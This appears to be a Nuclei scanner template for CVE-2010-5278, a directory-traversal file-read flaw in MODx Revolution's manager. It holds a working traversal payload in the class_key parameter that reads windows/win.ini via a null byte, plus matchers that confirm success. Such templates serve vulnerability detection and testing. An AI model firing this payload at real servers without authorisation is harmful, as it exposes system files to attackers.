id: CVE-2010-5278 info: name: MODx manager - Local File Inclusion author: daffainfo severity: high description: "A directory traversal vulnerability in manager/controllers/default/resource/tvs.php in MODx Revolution 2.0.2-pl and possibly earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the class_key parameter when magic_quotes_gpc is disabled." reference: - https://www.exploit-db.com/exploits/34788 - https://www.cvedetails.com/cve/CVE-2010-5278 classification: cve-id: CVE-2010-5278 tags: cve,cve2010,lfi requests: - method: GET path: - "{{BaseURL}}/manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00" matchers-condition: and matchers: - type: status status: - 200 - type: word words: - "bit app support" - "fonts" - "extensions" condition: and part: body # Enhanced by mp on 2022/03/30